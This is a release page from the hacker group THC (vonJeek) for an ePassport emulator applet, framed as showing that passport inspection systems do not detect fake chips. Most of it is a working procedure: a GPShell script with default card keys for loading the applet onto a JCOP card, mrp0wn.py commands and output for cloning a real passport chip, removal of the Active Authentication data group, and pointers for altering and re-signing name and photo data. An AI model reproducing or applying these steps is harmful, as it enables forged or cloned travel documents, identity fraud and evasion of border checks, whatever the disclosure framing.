logo
THC/vonJeek proudly presents an ePassport emulator. This emulator applet 
allows you to create a backup of your own passport chip(s).
 
 
The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.
 
The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.
 
Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.
 
ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!
 
Just follow two easy steps:
 
(1) Upload the emulator code to a blank JCOP v4.1 72k smart card 
Use your favorite tool to upload the CAP file. As an example GPShell is 
used. The script used to upload the CAP file:
 
P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:
 
P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

* EF.COM : 32 bytes (required file) * EF.SOD : 2560 bytes (required file) * EF.DG1 : 96 bytes (required file) * EF.DG2 : 24576 bytes (required file) * EF.DG11: 64 bytes (optional, e.g. USA) * EF.DG12: 96 bytes (optional, e.g. USA) * EF.DG13: 96 bytes (optional, e.g. Japan, France) * EF.DG15: 192 bytes (optional, e.g. The Netherlands)
If you need support for other / larger DGs, please let vonJeek know.
(2a) Clone the chip Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able to read a chip's content and to write it to an emulator. P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999 =============================================================================== = mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> = = Use Jeroen van Beek's ePassport emulator as the target device. = =============================================================================== Put a ePassport near the terminal and press enter to continue... Reading document using KEY M3V0NJ33K000000999999, please be patient... Put the emulator near the terminal and press enter to continue... Writing new ePassport using files in /tmp. Writing /tmp/EF_COM.BIN: 0 bytes left... Writing /tmp/EF_SOD.BIN: 0 bytes left... Writing /tmp/EF_DG1.BIN: 0 bytes left... Writing /tmp/EF_DG2.BIN: 0 bytes left... Setting the secret key to M3V0NJ33K200000009999998. Done, happy mrp0wning ;) Use the following command to read the chip: ./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" If your chip is protected using the optional Active Authentication mechanism, the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This attack will work on all inspection system implementations that are using e.g. ICAO's "worked examples", see this site for more info on that.
index

(2b) Write saved data It's also possible to write chip data you've saved earlier using RFIDIOt's mrpkey.py. As an example you can use vonJeek's ePassport data. Note that this data is self-signed: vonJeek started his own country :-D P:\tmp>unzip vonjeek-epassport_dump.zip Archive: vonjeek-epassport_dump.zip extracting: EF_COM.BIN inflating: EF_DG2.BIN inflating: EF_DG1.BIN extracting: EF_SOD.BIN P:\>cd \RFIDIOt-vonjeek P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp =============================================================================== = mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> = = Use Jeroen van Beek's ePassport emulator as the target device. = =============================================================================== Document type is PASSPORT. Put the emulator near the terminal and press enter to continue... Writing new ePassport using files in /tmp. Writing /tmp/EF_COM.BIN: 0 bytes left... Writing /tmp/EF_SOD.BIN: 0 bytes left... Writing /tmp/EF_DG1.BIN: 0 bytes left... Writing /tmp/EF_DG2.BIN: 0 bytes left... Setting the secret key to M3V0NJ33K200000009999998. Done, happy mrp0wning ;) Use the following command to read the chip: ./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" You can also alter data before writing it to an emulator chip. If you want to do that: this document contains details about - amongst others - DG1 and DG2 encoding. If you've updated the DGs you can sign them using Peter Gutmann's CryptLib.
A read-out of vonJeek's ePassport chip using the reference implementation named Golden Reader Tool can be seen below.
vonJeek's passport

If you're interested in ePassport related PKI (how to verify whether chip content is signed by a bonafide authority?) please check the following URLs:
* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx * http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf * http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf * http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece * http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece
Yours sincerly, vonjeek [at] thc dot org The Hackers Choice http://www.thc.org